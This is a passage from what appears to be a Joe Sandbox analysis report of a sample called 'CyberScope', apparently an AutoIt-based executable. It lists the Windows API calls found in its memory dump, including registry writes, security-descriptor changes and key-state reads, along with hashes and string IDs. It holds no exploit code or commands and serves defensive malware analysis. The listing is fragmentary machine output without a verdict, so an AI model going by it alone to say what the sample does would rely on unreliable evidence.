                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 001D2F85
                                                                                      • Part of subcall function 00191802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00191488,?,00000000,?,?,?,?,0019145A,00000000,?), ref: 00191865
                                                                                    • SendMessageW.USER32(?,00001053), ref: 001D2FC1
                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 001D2FD8
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 001D2FEE
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 001D2FF9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                    • String ID: 0$(&$(&$(&
                                                                                    • API String ID: 2760611726-3638583506
                                                                                    • Opcode ID: 223295b15788285f1d86c65ef1d16d1bf268e4cf3379c7665e16d39b1c548ba2
                                                                                    • Instruction ID: 47a84da4d5c73f14c4ec9a959332401084ae92e25bc74bbbaa20b8907792edea
                                                                                    • Opcode Fuzzy Hash: 223295b15788285f1d86c65ef1d16d1bf268e4cf3379c7665e16d39b1c548ba2
                                                                                    • Instruction Fuzzy Hash: BE12DF30605602EFDB29CF14D848BA9B7E5FB54300F28856AF4A59B261C7B1EC96CF91
                                                                                    APIs
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00227B67
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00227B98
                                                                                    • GetSysColor.USER32(0000000F), ref: 00227BA4
                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00227BBE
                                                                                    • SelectObject.GDI32(?,?), ref: 00227BCD
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00227BF8
                                                                                    • GetSysColor.USER32(00000010), ref: 00227C00
                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00227C07
                                                                                    • FrameRect.USER32(?,?,00000000), ref: 00227C16
                                                                                    • DeleteObject.GDI32(00000000), ref: 00227C1D
                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00227C68
                                                                                    • FillRect.USER32(?,?,?), ref: 00227C9A
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00227CBC
                                                                                      • Part of subcall function 00227E22: GetSysColor.USER32(00000012), ref: 00227E5B
                                                                                      • Part of subcall function 00227E22: SetTextColor.GDI32(?,00227B2D), ref: 00227E5F
                                                                                      • Part of subcall function 00227E22: GetSysColorBrush.USER32(0000000F), ref: 00227E75
                                                                                      • Part of subcall function 00227E22: GetSysColor.USER32(0000000F), ref: 00227E80
                                                                                      • Part of subcall function 00227E22: GetSysColor.USER32(00000011), ref: 00227E9D
                                                                                      • Part of subcall function 00227E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00227EAB
                                                                                      • Part of subcall function 00227E22: SelectObject.GDI32(?,00000000), ref: 00227EBC
                                                                                      • Part of subcall function 00227E22: SetBkColor.GDI32(?,?), ref: 00227EC5
                                                                                      • Part of subcall function 00227E22: SelectObject.GDI32(?,?), ref: 00227ED2
                                                                                      • Part of subcall function 00227E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00227EF1
                                                                                      • Part of subcall function 00227E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00227F08
                                                                                      • Part of subcall function 00227E22: GetWindowLongW.USER32(?,000000F0), ref: 00227F15
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                    • String ID:
                                                                                    • API String ID: 4124339563-0
                                                                                    • Opcode ID: ba1d6b8dc51db678d454db92f054a6baf1e5582baae14ba635e4218e0bb104ef
                                                                                    • Instruction ID: b624c73cbb3d5c3a8eaef1e13640bb2f8f6abb0d2a002c99bcc3662abbf1c901
                                                                                    • Opcode Fuzzy Hash: ba1d6b8dc51db678d454db92f054a6baf1e5582baae14ba635e4218e0bb104ef
                                                                                    • Instruction Fuzzy Hash: 72A1AD7201C312BFC7209FA4EC4CA6BBBA9FF48324F501A19F962961E0D7B1D965CB51
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000), ref: 0021319B
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002132C7
                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00213306
                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00213316
                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0021335D
                                                                                    • GetClientRect.USER32(00000000,?), ref: 00213369
                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 002133B2
                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002133C1
                                                                                    • GetStockObject.GDI32(00000011), ref: 002133D1
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 002133D5
                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 002133E5
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002133EE
                                                                                    • DeleteDC.GDI32(00000000), ref: 002133F7
                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00213423
                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0021343A
                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0021347A
                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0021348E
                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0021349F
                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 002134D4
                                                                                    • GetStockObject.GDI32(00000011), ref: 002134DF
                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002134EA
                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 002134F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                    • API String ID: 2910397461-517079104
                                                                                    • Opcode ID: a32ece888e82fe6af30560f83ab0df0dad2e52273ada466b423c9b76b3b5033d
                                                                                    • Instruction ID: d13771a6f94ed69cd5f537c43d0547dd94f917efa7760f79c16dbe2dc7bcecff
                                                                                    • Opcode Fuzzy Hash: a32ece888e82fe6af30560f83ab0df0dad2e52273ada466b423c9b76b3b5033d
                                                                                    • Instruction Fuzzy Hash: CEB16071A10215BFEB24DFA8DC49FAEBBB9EB08710F108154F915E7290C7B4AD50CB94
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00205532
                                                                                    • GetDriveTypeW.KERNEL32(?,0022DC30,?,\\.\,0022DCD0), ref: 0020560F
                                                                                    • SetErrorMode.KERNEL32(00000000,0022DC30,?,\\.\,0022DCD0), ref: 0020577B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DriveType
                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                    • API String ID: 2907320926-4222207086
                                                                                    • Opcode ID: adbcd131d3a4666216b752fc7faf147e88338e26d6650a9f3382e215bc0df7c7
                                                                                    • Instruction ID: 4f2c6c163fb128239e1fb7f043041251c5a0c9304a8080fccd792b12bc50173c
                                                                                    • Opcode Fuzzy Hash: adbcd131d3a4666216b752fc7faf147e88338e26d6650a9f3382e215bc0df7c7
                                                                                    • Instruction Fuzzy Hash: E561D330AB4B15EBCB24DF24D9D187AB3B1AF15311B244015E806AB2E3C771DD25EF51
                                                                                    APIs
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001925F8
                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00192600
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0019262B
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00192633
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00192658
                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00192675
                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00192685
                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 001926B8
                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001926CC
                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 001926EA
                                                                                    • GetStockObject.GDI32(00000011), ref: 00192706
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00192711
                                                                                      • Part of subcall function 001919CD: GetCursorPos.USER32(?), ref: 001919E1
                                                                                      • Part of subcall function 001919CD: ScreenToClient.USER32(00000000,?), ref: 001919FE
                                                                                      • Part of subcall function 001919CD: GetAsyncKeyState.USER32(00000001), ref: 00191A23
                                                                                      • Part of subcall function 001919CD: GetAsyncKeyState.USER32(00000002), ref: 00191A3D
                                                                                    • SetTimer.USER32(00000000,00000000,00000028,0019199C), ref: 00192738
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                    • String ID: <)&$<)&$AutoIt v3 GUI$(&$(&$(&
                                                                                    • API String ID: 1458621304-1589327689
                                                                                    • Opcode ID: be0af4f193adda02e1f6b97ce1a6ef044a15324a02462d060a5ab077592e6f2f
                                                                                    • Instruction ID: 77dfba1f3d38f79d7d43b63b91d6946cdb1180b89c8a0eea345d7e23bb3993d7
                                                                                    • Opcode Fuzzy Hash: be0af4f193adda02e1f6b97ce1a6ef044a15324a02462d060a5ab077592e6f2f
                                                                                    • Instruction Fuzzy Hash: EDB16B31A01209EFDF18DFA8EC99BAE7BB4FB48314F114229FA15A7290D774E941CB51
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 00221BC4
                                                                                    • GetDesktopWindow.USER32 ref: 00221BD9
                                                                                    • GetWindowRect.USER32(00000000), ref: 00221BE0
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00221C35
                                                                                    • DestroyWindow.USER32(?), ref: 00221C55
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00221C89
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00221CA7
                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00221CB9
                                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00221CCE
                                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00221CE1
                                                                                    • IsWindowVisible.USER32(00000000), ref: 00221D3D
                                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00221D58
                                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00221D6C
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00221D84
                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00221DAA
                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00221DC4
                                                                                    • CopyRect.USER32(?,?), ref: 00221DDB
                                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00221E46
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                    • String ID: ($0$tooltips_class32
                                                                                    • API String ID: 698492251-4156429822
                                                                                    • Opcode ID: 619c73b923fd360352fdd99fe9046fcf3119d27ac013cc4d149cab0a5c61f084
                                                                                    • Instruction ID: 5dfd3889ccfc429b3ff394b8d8b51ff00aa0189644f7c1cd2b83642d02a8bf13
                                                                                    • Opcode Fuzzy Hash: 619c73b923fd360352fdd99fe9046fcf3119d27ac013cc4d149cab0a5c61f084
                                                                                    • Instruction Fuzzy Hash: 4FB1CE71614311AFD714DFA4E888F6BBBE5FF94310F008918F8899B2A1C771E825CB92
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00220D81
                                                                                    • _wcslen.LIBCMT ref: 00220DBB
                                                                                    • _wcslen.LIBCMT ref: 00220E25
                                                                                    • _wcslen.LIBCMT ref: 00220E8D
                                                                                    • _wcslen.LIBCMT ref: 00220F11
                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00220F61
                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00220FA0
                                                                                      • Part of subcall function 001AFD52: _wcslen.LIBCMT ref: 001AFD5D
                                                                                      • Part of subcall function 001F2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001F2BA5
                                                                                      • Part of subcall function 001F2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001F2BD7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                    • API String ID: 1103490817-719923060
                                                                                    • Opcode ID: cfe25357b6e9bc612547c6b4630de9d44fcc2c7ececaa2ecdd899e2bcdef8b09
                                                                                    • Instruction ID: 66c0cf1e82168ece52b9c3f3e1935b6185efc66000982de1e057d2345750c0d7
                                                                                    • Opcode Fuzzy Hash: cfe25357b6e9bc612547c6b4630de9d44fcc2c7ececaa2ecdd899e2bcdef8b09
                                                                                    • Instruction Fuzzy Hash: 1FE10331228352AFCB14DF64D59187AB3E2FFA8314B14495CF8969B3A2DB30ED55CB81
                                                                                    APIs
                                                                                      • Part of subcall function 001F1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001F1A60
                                                                                      • Part of subcall function 001F1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,001F14E7,?,?,?), ref: 001F1A6C
                                                                                      • Part of subcall function 001F1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001F14E7,?,?,?), ref: 001F1A7B
                                                                                      • Part of subcall function 001F1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001F14E7,?,?,?), ref: 001F1A82
                                                                                      • Part of subcall function 001F1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001F1A99
                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001F1741
                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001F1775
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 001F178C
                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 001F17C6
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001F17E2
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 001F17F9
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 001F1801
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 001F1808
                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001F1829
                                                                                    • CopySid.ADVAPI32(00000000), ref: 001F1830
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001F185F
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001F1881
                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001F1893
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F18BA
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001F18C1
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F18CA
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001F18D1
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F18DA
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001F18E1
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F18ED
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001F18F4
                                                                                      • Part of subcall function 001F1ADF: GetProcessHeap.KERNEL32(00000008,001F14FD,?,00000000,?,001F14FD,?), ref: 001F1AED
                                                                                      • Part of subcall function 001F1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,001F14FD,?), ref: 001F1AF4
                                                                                      • Part of subcall function 001F1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001F14FD,?), ref: 001F1B03
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                    • String ID:
                                                                                    • API String ID: 4175595110-0
                                                                                    • Opcode ID: ce9033bce65ee4eef62c383a41567b76a30424f9819eac2293acc2b29f1d40ba
                                                                                    • Instruction ID: e1f4d5d4b0be3b51832272dccc56231cfd0c2e20a2baac77e9d527939e87c3b3
                                                                                    • Opcode Fuzzy Hash: ce9033bce65ee4eef62c383a41567b76a30424f9819eac2293acc2b29f1d40ba
                                                                                    • Instruction Fuzzy Hash: 88711AB2D00209FBDB20DFE5ED49FFEBBB9AF44750F144125EA15A6190D7319A06CB60
                                                                                    APIs
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0021CF1D
                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0022DCD0,00000000,?,00000000,?,?), ref: 0021CFA4
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0021D004
                                                                                    • _wcslen.LIBCMT ref: 0021D054
                                                                                    • _wcslen.LIBCMT ref: 0021D0CF
                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0021D112
                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0021D221
                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0021D2AD
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0021D2E1
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0021D2EE
                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0021D3C0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                    • API String ID: 9721498-966354055
                                                                                    • Opcode ID: 164f080122ecc36d0ad6f8f8a18b3fe18213c6824b7f241aeac7ecd5b5cf3f5a
                                                                                    • Instruction ID: 59c3ae9e83cafdf31997276cd7a44f2493a334d73081e2031cee8a46f4a9bf5d
                                                                                    • Opcode Fuzzy Hash: 164f080122ecc36d0ad6f8f8a18b3fe18213c6824b7f241aeac7ecd5b5cf3f5a
                                                                                    • Instruction Fuzzy Hash: 41126835614201DFCB14DF14C895A6AB7E6FF98714F14889DF89A9B3A2CB31ED42CB81
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00221462
                                                                                    • _wcslen.LIBCMT ref: 0022149D
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002214F0
                                                                                    • _wcslen.LIBCMT ref: 00221526
                                                                                    • _wcslen.LIBCMT ref: 002215A2
                                                                                    • _wcslen.LIBCMT ref: 0022161D
                                                                                      • Part of subcall function 001AFD52: _wcslen.LIBCMT ref: 001AFD5D
                                                                                      • Part of subcall function 001F3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001F3547
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                    • API String ID: 1103490817-4258414348
                                                                                    • Opcode ID: a4e56cdf01a7d57529558364afdd5cc55a6ae0fa46221f1cd9d62830aa275a8d
                                                                                    • Instruction ID: e017bed38dd28daf885f58d44a9da9d06155bd81232c696294d63db40624bfbf
                                                                                    • Opcode Fuzzy Hash: a4e56cdf01a7d57529558364afdd5cc55a6ae0fa46221f1cd9d62830aa275a8d
                                                                                    • Instruction Fuzzy Hash: 5BE1C135628312AFCB14DF64D450C2AB7E2BFA4314F54895CF8969B3A2CB30ED65CB81
                                                                                    APIs
                                                                                    Strings
